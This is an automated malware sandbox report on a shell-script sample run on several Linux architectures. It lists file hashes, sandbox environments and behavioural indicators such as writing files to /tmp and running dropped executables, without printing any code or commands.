Analysis
max time kernel
150s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Size
10KB
MD5
9498e3b84daf1f4fc7db572ea81ea29a
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 24 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97